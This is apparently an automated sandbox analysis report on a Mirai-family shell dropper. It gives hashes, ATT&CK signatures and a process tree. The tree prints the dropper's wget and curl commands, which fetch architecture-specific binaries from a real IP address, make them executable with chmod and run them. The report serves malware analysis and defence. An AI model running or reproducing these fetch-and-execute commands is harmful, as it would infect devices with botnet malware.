Analysis
-
max time kernel
34s -
max time network
52s -
platform
debian-9_armhf -
resource
debian9-armhf-20240611-en -
resource tags
arch:armhfimage:debian9-armhf-20240611-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem -
submitted
20-11-2024 00:01
Static task
static1
Behavioral task
behavioral1
Sample
8UsA.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
8UsA.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
8UsA.sh
Resource
debian9-mipsbe-20240729-en
Behavioral task
behavioral4
Sample
8UsA.sh
Resource
debian9-mipsel-20240418-en
General
-
Target
8UsA.sh
-
Size
1KB
-
MD5
0b5a60057fc9d9ce95ba5cdaab501e68
-
SHA1
879040e7114865f81dbd3f2fb41409e0cb3b8966
-
SHA256
f31864614b06542c7128c1df20768c2f26464c32be9dd18b5e2c1252b3bb44f1
-
SHA512
d97b13f656458456b934ab1cdc205ec4efedebfa8ee98675ba38865e916563487d1fd5c649afad7376f469a60ecd16b7c502c549ac095d8be234f6d9e876f351
Malware Config
Signatures
-
Mirai family
-
File and Directory Permissions Modification 1 TTPs 10 IoCs
Adversaries may modify file or directory permissions to evade defenses.
Processes:
chmodchmodchmodchmodchmodchmodchmodchmodchmodchmodpid process 791 chmod 804 chmod 812 chmod 703 chmod 726 chmod 786 chmod 796 chmod 818 chmod 743 chmod 757 chmod -
Executes dropped EXE 10 IoCs
Processes:
3AvA3AvA3AvA3AvA3AvA3AvA3AvA3AvA3AvA3AvAioc pid process /tmp/3AvA 704 3AvA /tmp/3AvA 728 3AvA /tmp/3AvA 744 3AvA /tmp/3AvA 758 3AvA /tmp/3AvA 787 3AvA /tmp/3AvA 792 3AvA /tmp/3AvA 797 3AvA /tmp/3AvA 805 3AvA /tmp/3AvA 813 3AvA /tmp/3AvA 819 3AvA -
Checks CPU configuration 1 TTPs 10 IoCs
Checks CPU information which indicate if the system is a virtual machine.
Processes:
curlcurlcurlcurlcurlcurlcurlcurlcurlcurldescription ioc process File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl -
Processes:
curlcurlcurlcurlcurlcurlcurlcurlcurlcurldescription ioc process File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl -
System Network Configuration Discovery 1 TTPs 4 IoCs
Adversaries may gather information about the network configuration of a system.
Processes:
cat3AvAwgetcurlpid process 724 cat 728 3AvA 707 wget 716 curl -
Writes file to tmp directory 20 IoCs
Malware often drops required files in the /tmp directory.
Processes:
wgetwgetcurlcurlwgetwgetcurlwgetwgetwgetcurlcurlcurlwgetcurlcurlcurl8UsA.shcurlwgetdescription ioc process File opened for modification /tmp/IGxModz.arm7 wget File opened for modification /tmp/IGxModz.mips wget File opened for modification /tmp/IGxModz.mpsl curl File opened for modification /tmp/IGxModz.arm6 curl File opened for modification /tmp/IGxModz.mpsl wget File opened for modification /tmp/IGxModz.arm5 wget File opened for modification /tmp/IGxModz.arm5 curl File opened for modification /tmp/IGxModz.ppc wget File opened for modification /tmp/IGxModz.m68k wget File opened for modification /tmp/IGxModz.x86 wget File opened for modification /tmp/IGxModz.x86 curl File opened for modification /tmp/IGxModz.mips curl File opened for modification /tmp/IGxModz.m68k curl File opened for modification /tmp/IGxModz.sh4 wget File opened for modification /tmp/IGxModz.arm7 curl File opened for modification /tmp/IGxModz.ppc curl File opened for modification /tmp/IGxModz.sh4 curl File opened for modification /tmp/3AvA 8UsA.sh File opened for modification /tmp/IGxModz.arm4 curl File opened for modification /tmp/IGxModz.arm6 wget
Processes
-
/tmp/8UsA.sh/tmp/8UsA.sh1⤵
- Writes file to tmp directory
PID:653 -
/usr/bin/wgetwget http://154.213.189.14/bns/IGxModz.x862⤵
- Writes file to tmp directory
PID:656
-
-
/usr/bin/curlcurl -O http://154.213.189.14/bns/IGxModz.x862⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:683
-
-
/bin/catcat IGxModz.x862⤵PID:701
-
-
/bin/chmodchmod +x 3AvA 8UsA.sh IGxModz.x86 systemd-private-aaea58b58de5438c837e984796459c2c-systemd-timedated.service-LgHo0I2⤵
- File and Directory Permissions Modification
PID:703
-
-
/tmp/3AvA./3AvA x862⤵
- Executes dropped EXE
PID:704
-
-
/usr/bin/wgetwget http://154.213.189.14/bns/IGxModz.mips2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:707
-
-
/usr/bin/curlcurl -O http://154.213.189.14/bns/IGxModz.mips2⤵
- Checks CPU configuration
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:716
-
-
/bin/catcat IGxModz.mips2⤵
- System Network Configuration Discovery
PID:724
-
-
/bin/chmodchmod +x 3AvA 8UsA.sh IGxModz.mips IGxModz.x86 systemd-private-aaea58b58de5438c837e984796459c2c-systemd-timedated.service-LgHo0I2⤵
- File and Directory Permissions Modification
PID:726
-
-
/tmp/3AvA./3AvA mips2⤵
- Executes dropped EXE
- System Network Configuration Discovery
PID:728
-
-
/usr/bin/wgetwget http://154.213.189.14/bns/IGxModz.mpsl2⤵
- Writes file to tmp directory
PID:731
-
-
/usr/bin/curlcurl -O http://154.213.189.14/bns/IGxModz.mpsl2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:740
-
-
/bin/catcat IGxModz.mpsl2⤵PID:742
-
-
/bin/chmodchmod +x 3AvA 8UsA.sh IGxModz.mips IGxModz.mpsl IGxModz.x86 systemd-private-aaea58b58de5438c837e984796459c2c-systemd-timedated.service-LgHo0I2⤵
- File and Directory Permissions Modification
PID:743
-
-
/tmp/3AvA./3AvA mpsl2⤵
- Executes dropped EXE
PID:744
-
-
/usr/bin/wgetwget http://154.213.189.14/bns/IGxModz.arm42⤵PID:746
-
-
/usr/bin/curlcurl -O http://154.213.189.14/bns/IGxModz.arm42⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:747
-
-
/bin/catcat IGxModz.arm42⤵PID:755
-
-
/bin/chmodchmod +x 3AvA 8UsA.sh IGxModz.arm4 IGxModz.mips IGxModz.mpsl IGxModz.x86 systemd-private-aaea58b58de5438c837e984796459c2c-systemd-timedated.service-LgHo0I2⤵
- File and Directory Permissions Modification
PID:757
-
-
/tmp/3AvA./3AvA arm42⤵
- Executes dropped EXE
PID:758
-
-
/usr/bin/wgetwget http://154.213.189.14/bns/IGxModz.arm52⤵
- Writes file to tmp directory
PID:759
-
-
/usr/bin/curlcurl -O http://154.213.189.14/bns/IGxModz.arm52⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:784
-
-
/bin/catcat IGxModz.arm52⤵PID:785
-
-
/bin/chmodchmod +x 3AvA 8UsA.sh IGxModz.arm4 IGxModz.arm5 IGxModz.mips IGxModz.mpsl IGxModz.x86 systemd-private-aaea58b58de5438c837e984796459c2c-systemd-timedated.service-LgHo0I2⤵
- File and Directory Permissions Modification
PID:786
-
-
/tmp/3AvA./3AvA arm52⤵
- Executes dropped EXE
PID:787
-
-
/usr/bin/wgetwget http://154.213.189.14/bns/IGxModz.arm62⤵
- Writes file to tmp directory
PID:788
-
-
/usr/bin/curlcurl -O http://154.213.189.14/bns/IGxModz.arm62⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:789
-
-
/bin/catcat IGxModz.arm62⤵PID:790
-
-
/bin/chmodchmod +x 3AvA 8UsA.sh IGxModz.arm4 IGxModz.arm5 IGxModz.arm6 IGxModz.mips IGxModz.mpsl IGxModz.x86 systemd-private-aaea58b58de5438c837e984796459c2c-systemd-timedated.service-LgHo0I2⤵
- File and Directory Permissions Modification
PID:791
-
-
/tmp/3AvA./3AvA arm62⤵
- Executes dropped EXE
PID:792
-
-
/usr/bin/wgetwget http://154.213.189.14/bns/IGxModz.arm72⤵
- Writes file to tmp directory
PID:793
-
-
/usr/bin/curlcurl -O http://154.213.189.14/bns/IGxModz.arm72⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:794
-
-
/bin/catcat IGxModz.arm72⤵PID:795
-
-
/bin/chmodchmod +x 3AvA 8UsA.sh IGxModz.arm4 IGxModz.arm5 IGxModz.arm6 IGxModz.arm7 IGxModz.mips IGxModz.mpsl IGxModz.x86 systemd-private-aaea58b58de5438c837e984796459c2c-systemd-timedated.service-LgHo0I2⤵
- File and Directory Permissions Modification
PID:796
-
-
/tmp/3AvA./3AvA arm72⤵
- Executes dropped EXE
PID:797
-
-
/usr/bin/wgetwget http://154.213.189.14/bns/IGxModz.ppc2⤵
- Writes file to tmp directory
PID:798
-
-
/usr/bin/curlcurl -O http://154.213.189.14/bns/IGxModz.ppc2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:799
-
-
/bin/catcat IGxModz.ppc2⤵PID:803
-
-
/bin/chmodchmod +x 3AvA 8UsA.sh IGxModz.arm4 IGxModz.arm5 IGxModz.arm6 IGxModz.arm7 IGxModz.mips IGxModz.mpsl IGxModz.ppc IGxModz.x862⤵
- File and Directory Permissions Modification
PID:804
-
-
/tmp/3AvA./3AvA ppc2⤵
- Executes dropped EXE
PID:805
-
-
/usr/bin/wgetwget http://154.213.189.14/bns/IGxModz.m68k2⤵
- Writes file to tmp directory
PID:807
-
-
/usr/bin/curlcurl -O http://154.213.189.14/bns/IGxModz.m68k2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:808
-
-
/bin/catcat IGxModz.m68k2⤵PID:811
-
-
/bin/chmodchmod +x 3AvA 8UsA.sh IGxModz.arm4 IGxModz.arm5 IGxModz.arm6 IGxModz.arm7 IGxModz.m68k IGxModz.mips IGxModz.mpsl IGxModz.ppc IGxModz.x862⤵
- File and Directory Permissions Modification
PID:812
-
-
/tmp/3AvA./3AvA m68k2⤵
- Executes dropped EXE
PID:813
-
-
/usr/bin/wgetwget http://154.213.189.14/bns/IGxModz.sh42⤵
- Writes file to tmp directory
PID:815
-
-
/usr/bin/curlcurl -O http://154.213.189.14/bns/IGxModz.sh42⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:816
-
-
/bin/catcat IGxModz.sh42⤵PID:817
-
-
/bin/chmodchmod +x 3AvA 8UsA.sh IGxModz.arm4 IGxModz.arm5 IGxModz.arm6 IGxModz.arm7 IGxModz.m68k IGxModz.mips IGxModz.mpsl IGxModz.ppc IGxModz.sh4 IGxModz.x862⤵
- File and Directory Permissions Modification
PID:818
-
-
/tmp/3AvA./3AvA sh42⤵
- Executes dropped EXE
PID:819
-
Network
MITRE ATT&CK Enterprise v15
Defense Evasion
File and Directory Permissions Modification
1Linux and Mac File and Directory Permissions Modification
1Virtualization/Sandbox Evasion
1System Checks
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
139KB
MD5146a0bb5d835cff65a7c8b97ec3145de
SHA126569b4ff68b3fc8ed0ca5d17b74a77f159971cd
SHA2564436f0dd3e6566d029bc495a6035ee2f22c232f6d608370d621d898b2b76d95e
SHA5125c4f94c060c6e56236f58dec5cdbdad127d0bedf85f76afdd5165d75ec74ee16c54153cb270b1cb0f39c639d0352392d51aa0b25dfef229dea7f892d8e95d13c
-
Filesize
132KB
MD58a6923c24c3deffaba399ca545c19a45
SHA17be6ccbd8be63914c7b1c8a8593829be84d24350
SHA256bdd82dcb696e7b5f3554f81e2dce89a88a09571ddab8c2c89081511296379d96
SHA512be86626d2362e5129c6333b8c12040b0d75cce0ecf0e01830abe1b40f43d70fbdd5157df9d709e018ac4381ab6bf7f99b6e1fdb4939e12dbd7da8ab477e7efe1
-
Filesize
276B
MD5960b4fa9d5383373f0a1ea04929df01b
SHA1f78054d817db7742162a706b5d9f1fedcdf21140
SHA2563e3036a7715bae7bda5c0b2de74731a835b869ded4d470cddb7f6521114aca7a
SHA5122d5c6ad2bb0f8a8b971d759e3618e8636034cee5b76c362c2107b7fadc38bcaabbaa79cd19f5f2e949005e3d128b1a4efff187d1a3f035791dcbd1255b7ed73f
-
Filesize
49KB
MD52f09af4fa574eee01c552daa1631a404
SHA1a5fc3fdd3979ba7f01cf036ac4001b754ce54cac
SHA25665a8da0b02c02baf3e5c41028f91f6eaef118a35933e9df21069f599d111c474
SHA5125484b3960d2353aeeac7d5ccb854dedd28c5c9f6400c4262bbfe49ad11eb69d24436c0cc927fa18be39b2a3ff5ac3e1f89debbbfaa95d46c6b3012ef9476928f
-
Filesize
87KB
MD59cade77ffa8009fa3a857b37d20646ff
SHA1fb787ad30a834787722e2f7d0b8a2305c90fa31d
SHA2569345c1cd7fcbaa1de4691d36d9650f4e9ca833b209eb13a3f0a6602e26cb4517
SHA512be408bd542d1a117a1d78bd63ef522fb220b63cf66f810ff53b5e4726fed7a822763e395ea97f7a7134e2507f4804e55a1cf02a75f9ebeb0149992c302d0c013
-
Filesize
68KB
MD53babcad0786bd3ac084c3ef8bfeaf14f
SHA1362e7893d9faa99441e51580e36bc1a8499b0020
SHA256549428f4edfd5acb557015836a7bad388d5f812aa558c388f313a48aef2b480e
SHA512a503e6f09705a1f204da65a428983c5c46f395d22ea1c559bc1af0d8d19f2cb8eaced4f87e19d688770ee4f1000da6aa75fbf21f877daa475e9617d891d5e45f